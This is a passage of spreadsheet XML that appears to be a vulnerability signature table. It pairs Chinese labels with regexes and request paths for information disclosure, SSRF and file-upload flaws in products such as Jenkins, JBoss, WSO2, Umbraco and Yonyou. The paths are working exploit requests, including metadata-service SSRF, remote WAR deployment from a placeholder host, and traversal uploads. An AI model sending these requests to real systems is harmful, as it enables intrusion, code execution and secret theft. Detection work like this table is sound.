    <t>.*?(?:/roundcube/logs/sendmail|/roundcube/logs/errors\.log|/webmail/logs/sendmail|/webmail/logs/errors|/logs/sendmail|/webmail/logs/errors\.log|/logs/errors|/logs/errors\.log|/mail/logs/errors\.log|/mail/logs/errors|/mail/logs/sendmail|/roundcube/logs/errors).*</t>
  </si>
  <si>
    <t>/roundcube/logs/sendmail|/roundcube/logs/errors.log|/webmail/logs/sendmail|/webmail/logs/errors|/logs/sendmail|/webmail/logs/errors.log|/logs/errors|/logs/errors.log|/mail/logs/errors.log|/mail/logs/errors|/mail/logs/sendmail|/roundcube/logs/errors</t>
  </si>
  <si>
    <t>Rails_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/config/initializers/secret_token\.rb).*</t>
  </si>
  <si>
    <t>/config/initializers/secret_token.rb</t>
  </si>
  <si>
    <t>Sftp凭据</t>
  </si>
  <si>
    <t>Sftp凭据_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/ftpsync\.settings|/sftp\-config\.json).*</t>
  </si>
  <si>
    <t>/ftpsync.settings|/sftp-config.json</t>
  </si>
  <si>
    <t>Vbulletin 完整路径</t>
  </si>
  <si>
    <t>Vbulletin 完整路径_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/calendar\.php\?do\[\]=\[test\.dll\]).*</t>
  </si>
  <si>
    <t>/calendar.php?do[]=[test.dll]</t>
  </si>
  <si>
    <t>Woodwing Studio服务器Git配置</t>
  </si>
  <si>
    <t>Woodwing Studio服务器Git配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/StudioServer/\.git/config|/Server/\.git/config).*</t>
  </si>
  <si>
    <t>/StudioServer/.git/config|/Server/.git/config</t>
  </si>
  <si>
    <t>Wpeprivate配置</t>
  </si>
  <si>
    <t>Wpeprivate配置_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/_wpeprivate/config\.json).*</t>
  </si>
  <si>
    <t>/_wpeprivate/config.json</t>
  </si>
  <si>
    <t>谷歌服务json密钥</t>
  </si>
  <si>
    <t>谷歌服务json密钥_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/google\-services\.json|/android/app/google\-services\.json|/app/google\-services\.json).*</t>
  </si>
  <si>
    <t>/google-services.json|/android/app/google-services.json|/app/google-services.json</t>
  </si>
  <si>
    <t>google_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Wordpress_信息泄露</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=MEC\-ix\&amp;tab=MEC\-export\&amp;mec\-ix\-action=export\-events\&amp;format=xml).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=MEC-ix&amp;tab=MEC-export&amp;mec-ix-action=export-events&amp;format=xml</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?page=social\-metrics\-tracker\-export\&amp;smt_download_export_file=1).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&amp;smt_download_export_file=1</t>
  </si>
  <si>
    <t>Apache_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/search\?q=Apple\&amp;shards=http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.apachesolr\.\{\{MY\-DOMAIN\}\}/solr/collection/config%23\&amp;stream\.body=\{"set\-property":\{"xxx":"yyy"\}\}).*</t>
  </si>
  <si>
    <t>/search?q=Apple&amp;shards=http://{{Host}}.{{Port}}.{{Hostname}}.apachesolr.{{MY-DOMAIN}}/solr/collection/config%23&amp;stream.body={"set-property":{"xxx":"yyy"}}</t>
  </si>
  <si>
    <t>apache_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Discuz！_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/forum\.php\?mod=ajax\&amp;action=downremoteimg\&amp;message=\[img\]http://\{\{interactsh\-url\}\}/\?1\.jpg\ \[/img\]).*</t>
  </si>
  <si>
    <t>/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://{{interactsh-url}}/?1.jpg [/img]</t>
  </si>
  <si>
    <t>ssrf_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Ibm</t>
  </si>
  <si>
    <t>Ibm_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/wps/PA_WCM_Authoring_UI/proxy/http/example\.com|/docpicker/internal_proxy/http/example\.com).*</t>
  </si>
  <si>
    <t>/wps/PA_WCM_Authoring_UI/proxy/http/example.com|/docpicker/internal_proxy/http/example.com</t>
  </si>
  <si>
    <t>Jboss</t>
  </si>
  <si>
    <t>Jboss_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/jmx\-console/HtmlAdaptor\?action=invokeOp\&amp;name=jboss\.system:service=MainDeployer\&amp;methodIndex=17\&amp;arg0=http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.jboss\.\{\{MY\-DOMAIN\}\}/utils/cmd\.war).*</t>
  </si>
  <si>
    <t>/jmx-console/HtmlAdaptor?action=invokeOp&amp;name=jboss.system:service=MainDeployer&amp;methodIndex=17&amp;arg0=http://{{Host}}.{{Port}}.{{Hostname}}.jboss.{{MY-DOMAIN}}/utils/cmd.war</t>
  </si>
  <si>
    <t>Jira_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/plugins/servlet/oauth/users/icon\-uri\?consumerUri=https://ipinfo\.io/json).*</t>
  </si>
  <si>
    <t>/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json</t>
  </si>
  <si>
    <t>atlassian_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/plugins/servlet/gadgets/makeRequest\?url=request\.url\.scheme://request\.url\.host@reverse\.domain).*</t>
  </si>
  <si>
    <t>/plugins/servlet/gadgets/makeRequest?url=request.url.scheme://request.url.host@reverse.domain</t>
  </si>
  <si>
    <t>Jenkins系统</t>
  </si>
  <si>
    <t>CVE-2018-1000600</t>
  </si>
  <si>
    <t>Jenkins系统_服务端请求伪造_CVE-2018-1000600</t>
  </si>
  <si>
    <t>.*?(?:/securityRealm/user/admin/descriptorByName/org\.jenkinsci\.plugins\.github\.config\.GitHubTokenCredentialsCreator/createTokenByPassword\?apiUrl=reverse\.url).*</t>
  </si>
  <si>
    <t>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=reverse.url</t>
  </si>
  <si>
    <t>Microstrategy</t>
  </si>
  <si>
    <t>Microstrategy_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/MicroStrategy/servlet/taskProc\?taskId=shortURL\&amp;taskEnv=xml\&amp;taskContentType=xml\&amp;srcURL=https://google\.com|/servlet/taskProc\?taskId=shortURL\&amp;taskEnv=xml\&amp;taskContentType=xml\&amp;srcURL=https://google\.com).*</t>
  </si>
  <si>
    <t>/MicroStrategy/servlet/taskProc?taskId=shortURL&amp;taskEnv=xml&amp;taskContentType=xml&amp;srcURL=https://google.com|/servlet/taskProc?taskId=shortURL&amp;taskEnv=xml&amp;taskContentType=xml&amp;srcURL=https://google.com</t>
  </si>
  <si>
    <t>Openfire</t>
  </si>
  <si>
    <t>Openfire_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/getFavicon\?host=baidu\.com/\?).*</t>
  </si>
  <si>
    <t>/getFavicon?host=baidu.com/?</t>
  </si>
  <si>
    <t>Parameter</t>
  </si>
  <si>
    <t>Parameter_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:\?access=http://\{\{interactsh\-url\}\}/\&amp;adm=http://\{\{interactsh\-url\}\}/\&amp;admin=http://\{\{interactsh\-url\}\}/\&amp;alter=http://\{\{interactsh\-url\}\}/\&amp;callback=http://\{\{interactsh\-url\}\}/\&amp;cfg=http://\{\{interactsh\-url\}\}/\&amp;clone=http://\{\{interactsh\-url\}\}/\&amp;continue=http://\{\{interactsh\-url\}\}/\&amp;create=http://\{\{interactsh\-url\}\}/\&amp;data=http://\{\{interactsh\-url\}\}/\&amp;dbg=http://\{\{interactsh\-url\}\}/\&amp;debug=http://\{\{interactsh\-url\}\}/\&amp;delete=http://\{\{interactsh\-url\}\}/\&amp;dest=http://\{\{interactsh\-url\}\}/\&amp;dir=http://\{\{interactsh\-url\}\}/\&amp;disable=http://\{\{interactsh\-url\}\}/\&amp;doc=http://\{\{interactsh\-url\}\}/\&amp;document=http://\{\{interactsh\-url\}\}/\&amp;domain=http://\{\{interactsh\-url\}\}/\&amp;edit=http://\{\{interactsh\-url\}\}/\&amp;enable=http://\{\{interactsh\-url\}\}/\&amp;exec=http://\{\{interactsh\-url\}\}/\&amp;execute=http://\{\{interactsh\-url\}\}/\&amp;feed=http://\{\{interactsh\-url\}\}/\&amp;file=http://\{\{interactsh\-url\}\}/\&amp;filename=http://\{\{interactsh\-url\}\}/\&amp;folder=http://\{\{interactsh\-url\}\}/\&amp;grant=http://\{\{interactsh\-url\}\}/\&amp;host=http://\{\{interactsh\-url\}\}/\&amp;html=http://\{\{interactsh\-url\}\}/\&amp;img=http://\{\{interactsh\-url\}\}/\&amp;load=http://\{\{interactsh\-url\}\}/\&amp;make=http://\{\{interactsh\-url\}\}/\&amp;modify=http://\{\{interactsh\-url\}\}/\&amp;navigation=http://\{\{interactsh\-url\}\}/\&amp;next=http://\{\{interactsh\-url\}\}/\&amp;open=http://\{\{interactsh\-url\}\}/\&amp;out=http://\{\{interactsh\-url\}\}/\&amp;page=http://\{\{interactsh\-url\}\}/\&amp;path=http://\{\{interactsh\-url\}\}/\&amp;pg=http://\{\{interactsh\-url\}\}/\&amp;php_path=http://\{\{interactsh\-url\}\}/\&amp;port=http://\{\{interactsh\-url\}\}/\&amp;redirect=http://\{\{interactsh\-url\}\}/\&amp;reference=http://\{\{interactsh\-url\}\}/\&amp;rename=http://\{\{interactsh\-url\}\}/\&amp;reset=http://\{\{interactsh\-url\}\}/\&amp;return=http://\{\{interactsh\-url\}\}/\&amp;root=http://\{\{interactsh\-url\}\}/\&amp;shell=http://\{\{interactsh\-url\}\}/\&amp;show=http://\{\{interactsh\-url\}\}/\&amp;site=http://\{\{interactsh\-url\}\}/\&amp;style=http://\{\{interactsh\-url\}\}/\&amp;test=http://\{\{interactsh\-url\}\}/\&amp;to=http://\{\{interactsh\-url\}\}/\&amp;toggle=http://\{\{interactsh\-url\}\}/\&amp;uri=http://\{\{interactsh\-url\}\}/\&amp;url=http://\{\{interactsh\-url\}\}/\&amp;val=http://\{\{interactsh\-url\}\}/\&amp;validate=http://\{\{interactsh\-url\}\}/\&amp;view=http://\{\{interactsh\-url\}\}/\&amp;window=http://\{\{interactsh\-url\}\}/).*</t>
  </si>
  <si>
    <t>?access=http://{{interactsh-url}}/&amp;adm=http://{{interactsh-url}}/&amp;admin=http://{{interactsh-url}}/&amp;alter=http://{{interactsh-url}}/&amp;callback=http://{{interactsh-url}}/&amp;cfg=http://{{interactsh-url}}/&amp;clone=http://{{interactsh-url}}/&amp;continue=http://{{interactsh-url}}/&amp;create=http://{{interactsh-url}}/&amp;data=http://{{interactsh-url}}/&amp;dbg=http://{{interactsh-url}}/&amp;debug=http://{{interactsh-url}}/&amp;delete=http://{{interactsh-url}}/&amp;dest=http://{{interactsh-url}}/&amp;dir=http://{{interactsh-url}}/&amp;disable=http://{{interactsh-url}}/&amp;doc=http://{{interactsh-url}}/&amp;document=http://{{interactsh-url}}/&amp;domain=http://{{interactsh-url}}/&amp;edit=http://{{interactsh-url}}/&amp;enable=http://{{interactsh-url}}/&amp;exec=http://{{interactsh-url}}/&amp;execute=http://{{interactsh-url}}/&amp;feed=http://{{interactsh-url}}/&amp;file=http://{{interactsh-url}}/&amp;filename=http://{{interactsh-url}}/&amp;folder=http://{{interactsh-url}}/&amp;grant=http://{{interactsh-url}}/&amp;host=http://{{interactsh-url}}/&amp;html=http://{{interactsh-url}}/&amp;img=http://{{interactsh-url}}/&amp;load=http://{{interactsh-url}}/&amp;make=http://{{interactsh-url}}/&amp;modify=http://{{interactsh-url}}/&amp;navigation=http://{{interactsh-url}}/&amp;next=http://{{interactsh-url}}/&amp;open=http://{{interactsh-url}}/&amp;out=http://{{interactsh-url}}/&amp;page=http://{{interactsh-url}}/&amp;path=http://{{interactsh-url}}/&amp;pg=http://{{interactsh-url}}/&amp;php_path=http://{{interactsh-url}}/&amp;port=http://{{interactsh-url}}/&amp;redirect=http://{{interactsh-url}}/&amp;reference=http://{{interactsh-url}}/&amp;rename=http://{{interactsh-url}}/&amp;reset=http://{{interactsh-url}}/&amp;return=http://{{interactsh-url}}/&amp;root=http://{{interactsh-url}}/&amp;shell=http://{{interactsh-url}}/&amp;show=http://{{interactsh-url}}/&amp;site=http://{{interactsh-url}}/&amp;style=http://{{interactsh-url}}/&amp;test=http://{{interactsh-url}}/&amp;to=http://{{interactsh-url}}/&amp;toggle=http://{{interactsh-url}}/&amp;uri=http://{{interactsh-url}}/&amp;url=http://{{interactsh-url}}/&amp;val=http://{{interactsh-url}}/&amp;validate=http://{{interactsh-url}}/&amp;view=http://{{interactsh-url}}/&amp;window=http://{{interactsh-url}}/</t>
  </si>
  <si>
    <t>Wordpress_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/wp\-json/oembed/1\.0/proxy\?url=http://\{\{interactsh\-url\}\}/).*</t>
  </si>
  <si>
    <t>/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/</t>
  </si>
  <si>
    <t>Wso</t>
  </si>
  <si>
    <t>Wso_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/shindig/gadgets/proxy\?container=default\&amp;gadget=http://169\.254\.169\.254/latest/meta\-data/\&amp;debug=1\&amp;nocache=1\&amp;html_tag_context=link\&amp;url=http://169\.254\.169\.254/latest/meta\-data).*</t>
  </si>
  <si>
    <t>/shindig/gadgets/proxy?container=default&amp;gadget=http://169.254.169.254/latest/meta-data/&amp;debug=1&amp;nocache=1&amp;html_tag_context=link&amp;url=http://169.254.169.254/latest/meta-data</t>
  </si>
  <si>
    <t>Anheng</t>
  </si>
  <si>
    <t>Anheng_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/service/\?unix:/\.\./\.\./\.\./\.\./var/run/rpc/xmlrpc\.sock|http://test/wsrpc).*</t>
  </si>
  <si>
    <t>/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc</t>
  </si>
  <si>
    <t>.*?(?:/solr/db/replication\?command=fetchindex\&amp;masterUrl=http://127\.0\.0\.1\&amp;wt=json\&amp;httpBasicAuthUser=\&amp;httpBasicAuthPassword=).*</t>
  </si>
  <si>
    <t>/solr/db/replication?command=fetchindex&amp;masterUrl=http://127.0.0.1&amp;wt=json&amp;httpBasicAuthUser=&amp;httpBasicAuthPassword=</t>
  </si>
  <si>
    <t>Atlassian Confluence_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/rest/sharelinks/1\.0/link\?url=https://\{\{interactsh\-url\}\}/).*</t>
  </si>
  <si>
    <t>/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/</t>
  </si>
  <si>
    <t>.*?(?:/forum\.php\?mod=ajax\&amp;action=downremoteimg\&amp;message=\[img\]http://\{\{interactsh\-url\}\}/test\?\.jpg\[/img\]).*</t>
  </si>
  <si>
    <t>/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://{{interactsh-url}}/test?.jpg[/img]</t>
  </si>
  <si>
    <t>Microstrategy Tinyurl</t>
  </si>
  <si>
    <t>Microstrategy Tinyurl_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/servlet/taskProc\?taskId=shortURL\&amp;taskEnv=xml\&amp;taskContentType=xml\&amp;srcURL=https://google\.com|/MicroStrategy/servlet/taskProc\?taskId=shortURL\&amp;taskEnv=xml\&amp;taskContentType=xml\&amp;srcURL=https://google\.com).*</t>
  </si>
  <si>
    <t>/servlet/taskProc?taskId=shortURL&amp;taskEnv=xml&amp;taskContentType=xml&amp;srcURL=https://google.com|/MicroStrategy/servlet/taskProc?taskId=shortURL&amp;taskEnv=xml&amp;taskContentType=xml&amp;srcURL=https://google.com</t>
  </si>
  <si>
    <t>Office Web Apps Server Full Read</t>
  </si>
  <si>
    <t>Office Web Apps Server Full Read_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/oh/wopi/files/@/wFileId/contents\?wFileId=http://\{\{oast\}\}/\{\{string\}\}\.xlsx%3fbody=\{\{string\}\}%26header=Location:http://oast\.pro%26status=302\&amp;access_token_ttl=0).*</t>
  </si>
  <si>
    <t>/oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&amp;access_token_ttl=0</t>
  </si>
  <si>
    <t>Splash Render</t>
  </si>
  <si>
    <t>Splash Render_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/render\.html\?url=https://oast\.live).*</t>
  </si>
  <si>
    <t>/render.html?url=https://oast.live</t>
  </si>
  <si>
    <t>Ueditor</t>
  </si>
  <si>
    <t>Ueditor_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/ueditor/jsp/controller\.jsp\?action=catchimage\&amp;source\[\]=http://127\.0\.0\.1:\{\{rand_text_numeric\(6\)\}\}/\?1\.png|/ueditor/php/controller\.php\?action=catchimage\&amp;source\[\]=http://127\.0\.0\.1:\{\{rand_text_numeric\(6\)\}\}/\?1\.png).*</t>
  </si>
  <si>
    <t>/ueditor/jsp/controller.jsp?action=catchimage&amp;source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png|/ueditor/php/controller.php?action=catchimage&amp;source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png</t>
  </si>
  <si>
    <t>Umbraco_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/umbraco/BackOffice/Api/Help/GetContextHelpForPage\?section=content\&amp;tree=undefined\&amp;baseUrl=http://\{\{interactsh\-url\}\}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent\?section=TryToAvoidGetCacheItem111\&amp;baseUrl=http://\{\{interactsh\-url\}\}/|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss\?section=AvoidGetCacheItem\&amp;baseUrl=http://\{\{interactsh\-url\}\}/|/umbraco/BackOffice/Api/Help/GetContextHelpForPage\?section=content\&amp;tree=undefined\&amp;baseUrl=http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.umbraco\.\{\{MY\-DOMAIN\}\}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent\?section=TryToAvoidGetCacheItem111\&amp;baseUrl=http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.umbraco\.\{\{MY\-DOMAIN\}\}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss\?section=AvoidGetCacheItem\&amp;baseUrl=http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.umbraco\.\{\{MY\-DOMAIN\}\}).*</t>
  </si>
  <si>
    <t>/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&amp;tree=undefined&amp;baseUrl=http://{{interactsh-url}}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&amp;baseUrl=http://{{interactsh-url}}/|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&amp;baseUrl=http://{{interactsh-url}}/|/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&amp;tree=undefined&amp;baseUrl=http://{{Host}}.{{Port}}.{{Hostname}}.umbraco.{{MY-DOMAIN}}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&amp;baseUrl=http://{{Host}}.{{Port}}.{{Hostname}}.umbraco.{{MY-DOMAIN}}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&amp;baseUrl=http://{{Host}}.{{Port}}.{{Hostname}}.umbraco.{{MY-DOMAIN}}</t>
  </si>
  <si>
    <t>泛微_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/install/installOperate\.do\?svrurl=http://\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/install/installOperate.do?svrurl=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>Websphere Pre</t>
  </si>
  <si>
    <t>Websphere Pre_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/docpicker/common_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/PA_WCM_Authoring_UI/proxy/http/\{\{interactsh\-url\}\}|/wps/myproxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/common_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/docpicker/internal_proxy/http/\{\{interactsh\-url\}\}|/wps/cmis_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/\?uri=http://www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/PA_WCM_Authoring_UI/proxy/http/{{interactsh-url}}|/wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/docpicker/internal_proxy/http/{{interactsh-url}}|/wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>.*?(?:/wps/cmis_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/common_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/docpicker/common_proxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/wps/PA_WCM_Authoring_UI/proxy/http/\{\{interactsh\-url\}\}|/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/\?uri=http://www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}|/docpicker/internal_proxy/http/\{\{interactsh\-url\}\}|/wps/myproxy/http/www\.redbooks\.ibm\.com/Redbooks\.nsf/RedbookAbstracts/sg247798\.html\?Logout\&amp;RedirectTo=http://\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/wps/PA_WCM_Authoring_UI/proxy/http/{{interactsh-url}}|/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}|/docpicker/internal_proxy/http/{{interactsh-url}}|/wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&amp;RedirectTo=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>.*?(?:/shindig/gadgets/proxy\?container=default\&amp;url=http://oast\.pro).*</t>
  </si>
  <si>
    <t>/shindig/gadgets/proxy?container=default&amp;url=http://oast.pro</t>
  </si>
  <si>
    <t>用友_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/uapws/service/nc\.pubitf\.rbac\.IUserPubServiceWS\?xsd=http://\{\{interactsh\-url\}\}|/uapws/service/nc\.pubitf\.rbac\.IUserPubServiceWS\?xsd=\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd=http://{{interactsh-url}}|/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd={{interactsh-url}}</t>
  </si>
  <si>
    <t>Zimbra 协作套件</t>
  </si>
  <si>
    <t>Zimbra 协作套件_服务端请求伪造</t>
  </si>
  <si>
    <t>.*?(?:/service/error/sfdc_preauth\.jsp\?session=s\&amp;userid=1\&amp;server=http://\{\{interactsh\-url\}\}%23\.salesforce\.com/).*</t>
  </si>
  <si>
    <t>安恒明御 Xmlrpc</t>
  </si>
  <si>
    <t>安恒明御 Xmlrpc_服务端请求伪造</t>
  </si>
  <si>
    <t>Cacti Weathermap系统任意文件写入</t>
  </si>
  <si>
    <t>任意文件写入</t>
  </si>
  <si>
    <t>Cacti Weathermap系统_任意文件写入</t>
  </si>
  <si>
    <t>.*?(?:/plugins/weathermap/editor\.php\?plug=0\&amp;mapname=test\.php\&amp;action=set_map_properties\&amp;param=\&amp;param2=\&amp;debug=existing\&amp;node_name=\&amp;node_x=\&amp;node_y=\&amp;node_new_name=\&amp;node_label=\&amp;node_infourl=\&amp;node_hover=\&amp;node_iconfilename=\-\-NONE\-\-\&amp;link_name=\&amp;link_bandwidth_in=\&amp;link_bandwidth_out=\&amp;link_target=\&amp;link_width=\&amp;link_infourl=\&amp;link_hover=\&amp;map_title=46ea1712d4b13b55b3f680cc5b8b54e8\&amp;map_legend=Traffic\+Load\&amp;map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S\&amp;map_linkdefaultwidth=7</t>
  </si>
  <si>
    <t>/plugins/weathermap/editor.php?plug=0&amp;mapname=test.php&amp;action=set_map_properties&amp;param=&amp;param2=&amp;debug=existing&amp;node_name=&amp;node_x=&amp;node_y=&amp;node_new_name=&amp;node_label=&amp;node_infourl=&amp;node_hover=&amp;node_iconfilename=--NONE--&amp;link_name=&amp;link_bandwidth_in=&amp;link_bandwidth_out=&amp;link_target=&amp;link_width=&amp;link_infourl=&amp;link_hover=&amp;map_title=46ea1712d4b13b55b3f680cc5b8b54e8&amp;map_legend=Traffic+Load&amp;map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&amp;map_linkdefaultwidth=7|/plugins/weathermap/configs/test.php</t>
  </si>
  <si>
    <t>任意文件上传</t>
  </si>
  <si>
    <t>锐捷_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/ddi/server/fileupload\.php\?uploadDir=\.\./\.\./321\&amp;name=test\.php).*</t>
  </si>
  <si>
    <t>/ddi/server/fileupload.php?uploadDir=../../321&amp;name=test.php</t>
  </si>
  <si>
    <t>upload_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>用友_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/portal/pt/file/upload\?pageId=login\&amp;filemanager=nc\.uap\.lfw\.file\.FileManager\&amp;iscover=true\&amp;billitem=\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5Cwebapps%5Cnc_web%5C).*</t>
  </si>
  <si>
    <t>/{{filename}}|/portal/pt/file/upload?pageId=login&amp;filemanager=nc.uap.lfw.file.FileManager&amp;iscover=true&amp;billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C</t>
  </si>
  <si>
    <t>致远</t>
  </si>
  <si>
    <t>致远_任意文件上传</t>
  </si>
  <si>
